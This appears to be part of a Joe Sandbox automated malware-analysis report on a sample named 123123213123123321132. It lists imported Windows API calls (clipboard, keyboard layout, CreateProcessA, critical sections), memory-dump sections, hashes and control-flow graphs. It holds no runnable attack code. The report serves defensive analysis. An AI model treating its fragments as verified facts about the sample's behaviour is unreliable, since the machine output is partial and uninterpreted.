                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Clipboard$Data$CloseOpen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 464010812-0
                                                                                                                                                        • Opcode ID: 3896003866d9e196f5e942c735a105be1c3c3aad61074d0ab1b34134e7345e92
                                                                                                                                                        • Instruction ID: 2f18cbc0f6c8a3dbd26954e8439ab7c802a903eab365c315afdcc22c9d276e9e
                                                                                                                                                        • Opcode Fuzzy Hash: 3896003866d9e196f5e942c735a105be1c3c3aad61074d0ab1b34134e7345e92
                                                                                                                                                        • Instruction Fuzzy Hash: 41E09AB230022517EB9026BA6C4CF97A2EC9F54F90F050123F604C6340E6A6CC0457B1
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004C9674
                                                                                                                                                        • GetKeyboardLayout.USER32(00000000), ref: 004C967B
                                                                                                                                                        • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,?,?,004D9D12,?,000000FF), ref: 004C9693
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentInfoKeyboardLayoutLocaleThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4094687451-0
                                                                                                                                                        • Opcode ID: 1ddd6823bd2bc3ee9e8a39c3bbd18c243f80e9d84aa9d73e1ce1e55aef709746
                                                                                                                                                        • Instruction ID: c18c3e67b2d418a81a9ed34cd04b46ff7c576915d0efad72319c368f8fc6f991
                                                                                                                                                        • Opcode Fuzzy Hash: 1ddd6823bd2bc3ee9e8a39c3bbd18c243f80e9d84aa9d73e1ce1e55aef709746
                                                                                                                                                        • Instruction Fuzzy Hash: A9E0E57A6003107BD601EB68BC09FAB77F8AB54B01F408419FA44C2280E338D90897FB
                                                                                                                                                        APIs
                                                                                                                                                        • GetSystemTime.KERNEL32(?,?,004CE646,?,0041E572), ref: 004CE5B7
                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(00563D90,?,?,004CE646,?,0041E572), ref: 004CE607
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Time$InformationSystemZone
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 702727434-0
                                                                                                                                                        • Opcode ID: f738a3c553d765e04b5bec4b324b6c4fee79bb83ad17f4052d4625c48ac5b856
                                                                                                                                                        • Instruction ID: 027c201d87c87fe04e998a3dacbc9da3b97e28b55a26ca5f2fa1b84a2cf7f3f2
                                                                                                                                                        • Opcode Fuzzy Hash: f738a3c553d765e04b5bec4b324b6c4fee79bb83ad17f4052d4625c48ac5b856
                                                                                                                                                        • Instruction Fuzzy Hash: E9011D78608201DBC310BF09E85556BB7F9FB78B10FC0850AE48583321E3F68D88DB29
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,00528C3A,-00000003), ref: 0052B447
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004012F9), ref: 0052B44E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1617791916-0
                                                                                                                                                        • Opcode ID: 59176d969d8d5ab64b55edfac97e4b95670c40f205a4eeb4c3389c15a55de6de
                                                                                                                                                        • Instruction ID: 2d67d1c8230b34df0e9697497b7d0e8b3de7afbebdcce056a4f33b586f436b97
                                                                                                                                                        • Opcode Fuzzy Hash: 59176d969d8d5ab64b55edfac97e4b95670c40f205a4eeb4c3389c15a55de6de
                                                                                                                                                        • Instruction Fuzzy Hash: 61B092B9604200ABDE009BA0AE0CB1BB678AB54702F000400B619C1160C630C804EB31
                                                                                                                                                        APIs
                                                                                                                                                        • CoCreateInstance.OLE32(00549E88,00000000,00000001,0054A654,?,?,?,004FB325,?,?,00000000,76ECE820), ref: 004F9365
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateInstance
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 542301482-0
                                                                                                                                                        • Opcode ID: 32cc378c3d08419dc9c729465278953167982d40ee5e1f975ead0e7be58d7922
                                                                                                                                                        • Instruction ID: d33697237a28c181885f9fc6147cb760b8f27fbda8fa23562785bbd0682874fe
                                                                                                                                                        • Opcode Fuzzy Hash: 32cc378c3d08419dc9c729465278953167982d40ee5e1f975ead0e7be58d7922
                                                                                                                                                        • Instruction Fuzzy Hash: E8F0823270111167D7288A2EEC45BE7B7D9AFD8710B05412ABD04D7280D7A0EC418594
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Version
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1889659487-0
                                                                                                                                                        • Opcode ID: ee60f9e95fcef11a94c07e1fc1ede8b3207cc5aa390eaa880cb51700aab72f76
                                                                                                                                                        • Instruction ID: 055774edfa36a1cc0f2afeca4167b9a8919af704cd7fbd49c209ae17ea6089f8
                                                                                                                                                        • Opcode Fuzzy Hash: ee60f9e95fcef11a94c07e1fc1ede8b3207cc5aa390eaa880cb51700aab72f76
                                                                                                                                                        • Instruction Fuzzy Hash: D3E0C22C0042804EE7608F38A90AB593BB1AB65244F8804DCD4E443213D3B9021FE766

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 26 4f4a60-4f4a93 EnterCriticalSection 27 4f4a95-4f4a9d 26->27 28 4f4aa3-4f4aab 26->28 27->28 29 4f4aad-4f4ab5 28->29 30 4f4abb-4f4ac3 28->30 29->30 31 4f4ac5-4f4acd 30->31 32 4f4ad3-4f4adb 30->32 31->32 33 4f4aed-4f4af5 32->33 34 4f4add-4f4ae7 32->34 35 4f4afb-4f4b07 LeaveCriticalSection 33->35 36 4f4bf2-4f4bfe LeaveCriticalSection 33->36 34->33 39 4f4b09-4f4b19 35->39 40 4f4b21-4f4b27 35->40 37 4f4c18-4f4c1e 36->37 38 4f4c00-4f4c10 36->38 43 4f4c38-4f4c3e 37->43 44 4f4c20-4f4c30 37->44 38->37 39->40 41 4f4b29-4f4b39 40->41 42 4f4b41-4f4b47 40->42 41->42 45 4f4bbb-4f4bc1 42->45 46 4f4b49-4f4b69 42->46 47 4f4cb2-4f4cb8 43->47 48 4f4c40-4f4c60 43->48 44->43 55 4f4f2f-4f4f35 45->55 56 4f4bc7-4f4bf1 45->56 49 4f4b6b 46->49 50 4f4b71-4f4bb8 call 462e80 call 4a5380 call 439d00 46->50 51 4f4cdc-4f4d05 EnterCriticalSection LeaveCriticalSection 47->51 52 4f4cba-4f4cd4 47->52 53 4f4c68-4f4caf call 462e80 call 4a5380 call 439d00 48->53 54 4f4c62 48->54 49->50 50->45 58 4f4f2e 51->58 59 4f4d0b-4f4d1c EnterCriticalSection LeaveCriticalSection 51->59 52->51 53->47 54->53 58->55 63 4f4d24-4f4d42 EnterCriticalSection 59->63 66 4f4df8-4f4e1d EnterCriticalSection call 4f3bc0 LeaveCriticalSection 63->66 67 4f4d48-4f4d50 63->67 76 4f4e1f-4f4e2b 66->76 77 4f4e3b-4f4e46 call 4f3340 66->77 67->66 70 4f4d56-4f4d6e EnterCriticalSection LeaveCriticalSection 67->70 74 4f4d74-4f4df1 EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 70->74 75 4f4df3 70->75 74->66 74->75 75->66 80 4f4e2d 76->80 81 4f4e32-4f4e34 76->81 89 4f4e97-4f4e9c LeaveCriticalSection 77->89 90 4f4e48-4f4e4d 77->90 80->81 81->77 86 4f4e36-4f4e39 81->86 86->77 86->89 91 4f4ea2-4f4ebd EnterCriticalSection 89->91 92 4f4e4f-4f4e51 90->92 93 4f4e69-4f4e73 call 4f3d00 90->93 95 4f4ebf-4f4ec1 91->95 96 4f4ed8-4f4ee5 LeaveCriticalSection 91->96 92->93 97 4f4e53-4f4e55 92->97 98 4f4e78-4f4e8f LeaveCriticalSection 93->98 99 4f4eca-4f4ed2 95->99 100 4f4ec3-4f4ec8 95->100 101 4f4f0c-4f4f12 96->101 102 4f4ee7-4f4efb EnterCriticalSection 96->102 97->93 103 4f4e57-4f4e67 call 4ff020 call 439d00 97->103 98->63 104 4f4e95 98->104 99->96 100->96 101->58 108 4f4f14-4f4f29 101->108 105 4f4efd 102->105 106 4f4f01-4f4f06 LeaveCriticalSection 102->106 103->98 104->91 105->106 106->101 108->58
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 004F4A89
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4AFB
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4BF2
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000), ref: 004F4CEA
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?), ref: 004F4CFD
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4D17
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4D1A
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4D36
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4D5D
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4D66
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4D81
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4D87
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4DB6
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4DC0
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4E05
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4E11
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,00000000), ref: 004F4E7D
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4E9C
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4EB3
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4ED9
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4EF4
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4F06
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Leave$Enter
                                                                                                                                                        • String ID: NetStream.Play.Start$NetStream.Play.Stop$NetStream.Play.StreamNotFound$NetStream.Seek.InvalidTime$NetStream.Seek.Notify$error$status
                                                                                                                                                        • API String ID: 2978645861-761530088
                                                                                                                                                        • Opcode ID: 8031fb2b16cf08ebb29042ea612b824201a734ec780002ffcc35b8889f179ffa
                                                                                                                                                        • Instruction ID: 162dc2aece2cb8deeda7270d3cf99ca9d96a23cce06d37320eaaf024755f17c1
                                                                                                                                                        • Opcode Fuzzy Hash: 8031fb2b16cf08ebb29042ea612b824201a734ec780002ffcc35b8889f179ffa
                                                                                                                                                        • Instruction Fuzzy Hash: C7E190352047459FD320DB34C845BABBBE1BF89714F04895DE9AA57382CB74F80ACB65

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 590 4d5d20-4d5d40 call 435350 593 4d6069-4d6073 590->593 594 4d5d46-4d5d56 call 435400 590->594 597 4d5d58-4d5d6f DestroyWindow 594->597 598 4d5d72-4d5d82 call 435400 594->598 601 4d5dab-4d5dbb call 435400 598->601 602 4d5d84-4d5da8 call 4d5380 call 4db4e0 598->602 608 4d5dbd-4d5dec call 4d5380 call 4a7ac0 601->608 609 4d5def-4d5dff call 435400 601->609 616 4d5fdc-4d5fec call 435400 609->616 617 4d5e05-4d5e12 609->617 631 4d5fee-4d602f call 4d5380 GetMenu call 4dad30 616->631 632 4d6032-4d6042 call 435400 616->632 620 4d5e14-4d5e16 617->620 621 4d5e41-4d5e55 GetModuleFileNameA 617->621 622 4d5e1c-4d5e1e 620->622 623 4d5e18-4d5e1a 620->623 624 4d605c-4d6066 621->624 625 4d5e5b-4d5e5c 621->625 628 4d5e24-4d5e26 622->628 629 4d5e20-4d5e22 622->629 623->622 627 4d5e38-4d5e3f 623->627 625->624 630 4d5e62-4d5e69 625->630 627->620 627->621 634 4d5e2c-4d5e2e 628->634 635 4d5e28-4d5e2a 628->635 629->627 629->628 636 4d5e6b-4d5e6e 630->636 637 4d5e80-4d5e82 630->637 632->593 645 4d6044-4d6056 call 4d5380 632->645 634->627 640 4d5e30-4d5e32 634->640 635->627 635->634 636->637 641 4d5e70-4d5e71 636->641 637->624 643 4d5e88-4d5e92 637->643 640->624 640->627 641->630 646 4d5e73-4d5e7d 641->646 644 4d5e95-4d5e9a 643->644 644->644 649 4d5e9c-4d5ec2 call 52b380 * 2 644->649 645->624 656 4d5fbf-4d5fd9 call 439d00 * 2 649->656 657 4d5ec8-4d5eca 649->657 657->656 659 4d5ed0-4d5eda 657->659 661 4d5ee0-4d5ee8 659->661 661->661 663 4d5eea-4d5eed 661->663 665 4d5ef0-4d5ef6 663->665 665->665 666 4d5ef8-4d5f20 665->666 667 4d5f22-4d5f2a 666->667 667->667 668 4d5f2c-4d5f30 667->668 669 4d5f33-4d5f39 668->669 669->669 670 4d5f3b-4d5f4d 669->670 671 4d5f50-4d5f55 670->671 671->671 672 4d5f57-4d5f5d 671->672 673 4d5f60-4d5f66 672->673 673->673 674 4d5f68-4d5fb9 CreateProcessA 673->674 674->656
                                                                                                                                                        APIs
                                                                                                                                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 004D5D5F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
